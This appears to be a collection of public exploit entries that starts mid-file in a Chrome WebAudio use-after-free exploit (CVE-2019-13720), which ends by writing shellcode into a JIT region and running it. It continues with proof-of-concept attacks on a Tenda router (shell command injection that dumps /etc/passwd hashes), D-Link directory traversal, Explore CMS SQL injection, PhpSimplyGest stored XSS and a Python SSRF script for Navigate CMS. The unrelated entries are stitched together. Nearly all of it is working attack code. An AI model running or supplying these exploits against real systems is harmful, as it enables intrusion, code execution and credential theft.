DebugLog("... found desired slot size! Reading freelist head for SlotSpan...");
SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct
HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);
DebugLog("... leaked slot span freelist address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16) + " for slot span " + SpanIndex.toString(10));
return HelperBigInt[0];
}
}
}
}
function ExecutePayload(FreeListHead) {
var WasmExport = CreateWasmJITExport();
let FileReaderObj = new FileReader;
let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment
DebugLog("... WASM module and FileReader created.");
FileReaderObj.onerror = WasmExport;
let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);
if (!FileReaderLoaderPtr) {
DebugLog("... failed to obtain free list head for bucket size 0x140 slot span");
return;
}
HelperBigInt[0] = FileReaderLoaderPtr;
DebugLog("... estimated a FileReaderLoader alloc address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent
let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);
if(ValidationPtr != FileReaderLoaderPtr) {
HelperBigInt[0] = ValidationPtr;
DebugLog("... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);
let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));
let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);
let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);
let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));
let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));
let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);
let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);
let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);
let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);
let StubAddrFieldOffset = undefined;
switch (MajorVersion) {
case 77:
StubAddrFieldOffset = BigInt(0x8) * BigInt(16);
break;
case 76:
StubAddrFieldOffset = BigInt(0x8) * BigInt(17);
break
}
let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);
HelperBigInt[0] = RwxJitStubPtr;
DebugLog("... resolved JIT stub address of " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
for(var x = 0; x < Egghunter.length; x += 8) {
JitChunkAddress = RwxJitStubPtr + BigInt(x);
HelperBigInt[0] = JitChunkAddress;
//DebugLog("... writing chunk of egghunter shellcode at offset " + x.toString(10) + " to JIT region at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
for(var y = 0; y < 8; y++) {
HelperUint8[y] = Egghunter[x + y];
}
WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);
}
HelperBigInt[0] = RwxJitStubPtr;
DebugLog("... executing shellcode at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
WasmExport();
}
else {
DebugLog("... failed to validate re-claim of FileReaderLoader slot at " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
}
}
async function PrePayloadHeapGroom() {
DebugLog("... grooming heap in preparation for R/W primitive creation and payload execution...");
await GC();
DoubleAllocAudioBufs = []; // These were the "holders" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers.
for (var j = 0; j < 80; j++) {
MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));
}
// At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.
IIRFilters = new Array(1);
await GC();
for (var j = 0; j < 336; j++) {
ImageDataArray.push(new ImageData(1, 2));
}
ImageDataArray = new Array(10);
await GC();
for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {
let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);
if (MutableFreeListEntry[0] != BigInt(0)) {
let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.
let AllocCount = 0;
MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);
// Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated
do {
GcPreventer.push(new ArrayBuffer(8));
if (++AllocCount > 0x100000) {
DebugLog("... failed to re-claim final free list flink with alloc spray");
return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed
}
} while (MutableFreeListEntry[0] != BigInt(0));
// The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).
let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays.
GcPreventer.push(FreeListHead);
ExecutePayload(FreeListHead);
return;
}
}
return;
}
async function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {
let NumberOfChannels = 1;
let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);
let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
let ConvolverNode = TempAudioCtx.createConvolver();
let Finished = false;
// Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)
let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);
let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);
SmallUafBuf.getChannelData(0).fill(0);
for (var i = 0; i < NumberOfChannels; i++) {
var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);
ChannelData[0] = FeedforwardAddress;
}
AudioBufferSourceNode.buffer = BigSourceBuf;
ConvolverNode.buffer = SmallUafBuf;
// Setup the audio processing graph and begin rendering
AudioBufferSourceNode.loop = true;
AudioBufferSourceNode.loopStart = 0;
AudioBufferSourceNode.loopEnd = 1;
AudioBufferSourceNode.connect(ConvolverNode);
ConvolverNode.connect(TempAudioCtx.destination);
AudioBufferSourceNode.start();
TempAudioCtx.startRendering().then(function(Buf) {
Buf = null;
if (Finished) {
TempAudioCtx = null;
setTimeout(CallbackFunc, 200);
return;
} else {
Finished = true;
setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);
}
});
while (!Finished) {
ConvolverNode.buffer = null;
await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer
if (Finished) {
break;
}
for (let i = 0; i < IIRFilters.length; i++) {
OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI.
IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);
if (OutputFloatArray[0] != 3.1415927410125732) {
Finished = true;
DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/"holding" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own.
DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));
AudioBufferSourceNode.disconnect();
ConvolverNode.disconnect();
return;
}
}
ConvolverNode.buffer = SmallUafBuf;
await Sleep(1);
}
}
function InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {
SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)
HelperBigInt[0] = LeakedFlinkPtr;
DebugLog("... leaked free list ptr from ScriptNode audio handler at iteration " + RenderCount.toString(10) + ": " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);
DebugLog("... Super page: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span.
HelperBigInt[0] = FeedforwardSuperPageBase;
DebugLog("... first Super Page in extent: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);
FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.
IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.
HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;
DebugLog("... IIRFilterFeedforwardAllocPtr: " + HelperDword[1].toString(16) + HelperDword[0].toString(16));
DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);
}
async function InfoleakUAF(CallbackFunc) {
let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode.
let AudioBufferSourceNode = TempAudioCtx.createBufferSource();
let ConvolverNode = TempAudioCtx.createConvolver();
let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel.
let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);
let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000);
let Finished = false;
let RenderCount = 0;
ConvolverNode.buffer = ChannelBuf;
AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full
AudioBufferSourceNode.loop = true;
AudioBufferSourceNode.loopStart = 0;
AudioBufferSourceNode.loopEnd = 1;
ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread
AudioBufferSourceNode.connect(ConvolverNode);
ConvolverNode.connect(ScriptNode);
ScriptNode.connect(TempAudioCtx.destination);
AudioBufferSourceNode.start();
ScriptNode.onaudioprocess = function(Evt) {
RenderCount++;
for (let i = 0; i < 1; i++) {
let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);
for (let j = 0; j < ChannelInputBuf.length; j++) {
/*
Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.
There are 16384 frames (each the size of a Float32) copied into the input channel buffer each
time this handler receives an event. Typically only 0-1 of these frames will contain a leaked
flink freelist pointer.
*/
if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {
let TempHelperBigInt = new BigUint64Array(1);
let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);
TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer
TempHelperDword[1] = ChannelInputBuf[j + 1];
let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);
// Check QWORD from SharedAudioBuffer for a non-zero value
if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {
LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?
}
if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {
// Valid leak: end the recursion cycle for this UAF and execute a callback
Finished = true;
Evt = null;
AudioBufferSourceNode.disconnect();
ScriptNode.disconnect();
ConvolverNode.disconnect();
setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);
return;
}
}
}
}
};
TempAudioCtx.startRendering().then(function(Buf) {
Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle
if (!Finished) {
Finished = true;
InfoleakUAF(CallbackFunc);
}
});
/*
Attack the race condition which allows for a free list flink to be copied
into the ScriptNode input channel buffer: the renderer thread is receiving
data into the SharedBuffer in the Convolver, processing it, then copying
it into the ScriptNode input channel until it is full (then the ScriptNode
receives an event). The SharedBuffer must be freed precisely between the
time when new data is received from the BufferSource, and the processed data
is copied into the ScriptNode. Simply freeing the buffer will not work,
since the next chunk of data from the BufferSource will not be placed into
SharedBuffer if it is NULL. However, there is no check if SharedBuffer is
NULL when the processed data it contains is copied into the ScriptNode input.
*/
while (!Finished) {
ConvolverNode.buffer = null;
ConvolverNode.buffer = ChannelBuf;
await Sleep(1); // 1ms
}
}
function FeedforwardHeapGroom() {
let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);
let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.
let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.
// Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.
FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f
FeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr
FeedforwardArray[1] = -1;
for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization.
IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray));
}
// Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page.
let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash.
for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span.
TempConvolver = TempAudioCtx.createConvolver();
AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000);
TempConvolver.buffer = AudioBuf;
GcPreventer.push(AudioBuf);
GcPreventer.push(TempConvolver);
}
// Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen.
let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance.
for(var x = 0; x < (Bucket200Slots / 2); x++) {
TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size)
GcPreventer.push(TempConvolver);
}
}
try {
var BrowserVersion = navigator.userAgent.split("Chrome/")[1].split(" Safari/")[0];
MajorVersion = parseInt(BrowserVersion.substr(0, 2));
if (MajorVersion <= 78) {
ValidBrowser = true;
if(MajorVersion != 76) {
alert("This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version");
}
}
else {
alert("CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser");
}
}
catch (e) {
DebugLog("... failed to parse browser version from user agent.");
}
if(ValidBrowser) {
FeedforwardHeapGroom();
InfoleakUAF(InfoleakUAFCallback);
}
else {
DebugLog("... unsupported browser version " + navigator.userAgent);
}
</script>
</html>
# Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
# Exploit Author: LiquidWorm
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability
Vendor: Tenda Technology Co.,Ltd.
Product web page: https://www.tendacn.com
https://www.tendacn.com/product/HG6.html
Affected version: Firmware version: 3.3.0-210926
Software version: v1.1.0
Hardware Version: v1.0
Check Version: TD_HG6_XPON_TDE_ISP
Summary: HG6 is an intelligent routing passive optical network
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
a voice port to meet users' requirements for enjoying the Internet,
HD IPTV and VoIP multi-service applications.
Desc: The application suffers from an authenticated OS command injection
vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
in formPing, formPing6, formTracert and formTracert6 interfaces.
Tested on: Boa/0.93.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5706
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php
22.04.2022
--
ping.asp:
---------
POST /boaform/formPing HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564
---
TZ
app.gwdt
bftpd.conf
buildtime
check_version.txt
config
config.csv
config_default.xml
config_default_hs.xml
dhclient-script
dnsmasq.conf
ethertypes
factory_default.xml
ftpdpassword
group
hardversion
inetd.conf
init.d
inittab
innversion
insdrv.sh
irf
mdev.conf
omci_custom_opt.conf
omci_ignore_mib_tbl.conf
omci_ignore_mib_tbl_10g.conf
omci_mib.cfg
orf
passwd
ppp
profile
protocols
radvd.conf
ramfs.img
rc_boot_dsp
rc_voip
release_date
resolv.conf
rtk_tr142.sh
run_customized_sdk.sh
runoam.sh
runomci.sh
runsdk.sh
samba
scripts
services
setprmt_reject
shells
simplecfgservice.xml
smb.conf
softversion
solar.conf
solar.conf.in
ssl_cert.pem
ssl_key.pem
version
wscd.conf
ping6.asp:
----------
POST /boaform/formPing6 HTTP/1.1
Host: 192.168.1.1
pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp
---
boa.conf
web
tracert.asp:
------------
POST /boaform/formTracert HTTP/1.1
Host: 192.168.1.1
traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp
---
/home/httpd
tracert6.asp:
-------------
POST /boaform/formTracert6 HTTP/1.1
Host: 192.168.1.1
traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp
---
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
nobody:x:0:0::/tmp:/dev/null
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass
# Exploit Title: Explore CMS 1.0 - SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: CVE-2022-27412
# POC
# SQL Injection
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page.
#Steps to reproduce
Following URL is vulnerable to SQL Injection in the 'id' field.
GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: REDACTED
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding
10.3.34-MariaDB
Server accepts the payload and the response get delayed by 7 seconds.
# Exploit Title: PHProjekt PhpSimplyGest v1.3.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-05-05
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.phprojekt.altervista.org (removed demo was at http://phprojekt.altervista.org/phpsimplygest130)
# Software Link: https://github.com/robyfofo/MyProjects (original PhpSimplyGest https://github.com/robyfofo/PhpSimplyGest now merged/renamed into MyProjects)
# Version: 1.3
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.32)
# CVE: CVE-2022-27308
# Description:
A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 (and related products from same vendor,
like "MyProjects") allows attacker to execute arbitrary web scripts or HTML.
Injecting persistent javascript code inside the title description (or content) while creating a project, todo, timecard,
estimates, report or finding, it will be triggered once page gets loaded.
# Steps to reproduce:
Click on Projects and add or edit an existing one,
Insert the following PoC inside the Title
<<SCRIPT>alert("XSS here");//\<</SCRIPT>
Click on 'Send'.
If a user visits the website dashboard, as well as project summary page, the javascript code will be rendered.
#!/usr/bin/env python3
# Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
# Exploit Author: cheshireca7
# Vendor Homepage: https://www.navigatecms.com/
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download
# Version: 2.9.4 and earlier
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-28117
#
# -*- coding: utf-8 -*-
import requests as r, signal
from emoji import emojize
from argparse import ArgumentParser
from sys import exit
from requests_toolbelt.multipart.encoder import MultipartEncoder
from hashlib import md5
from time import sleep
from base64 import b64decode,b64encode
from colorama import Fore, Style
#proxies = {'http':'http://127.0.0.1:8080'}
def handler(signum, frame):
print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8')))
exit()
def login():
print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...")
sleep(1)
try:
# Grabbing CSRF Token
s = r.Session()
resp = s.get(f"{args.target}/login.php")#, proxies=proxies)
csrf_token = resp.headers['X-Csrf-Token']
# Performing login
data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"})
headers = {'Content-Type':data.content_type}
resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies)
except:
print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in")
exit(-1)
if resp.status_code == 302:
print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!")
for cookie in resp.cookies:
if "NVSID" in cookie.name:
return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}")
else:
print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials")
exit(-1)
def exploit(values):
print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...")
sleep(1)
# Abusing cache feature to retrieve response
data = {'limit':'5','language':'en','url':f'{args.payload}'}
headers = {'X-Csrf-Token':values[0]}
cookies = {values[1].split('=')[0]:values[1].split('=')[1]}
resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies)
# Retrieving the file with response from static route
md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest()
resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies)
if len(resp.text) > 0:
print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...")
sleep(1)
print(f"\n{resp.text}")
exit(0)
else:
print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received")
exit(-1)
if __name__ == '__main__':
# Define parameters
signal.signal(signal.SIGINT, handler)
parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)')
parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)')
parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)')
parser.add_argument('-p','--password', required=True, help='Password to log in the CMS')
parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate')
args = parser.parse_args()
exploit(login())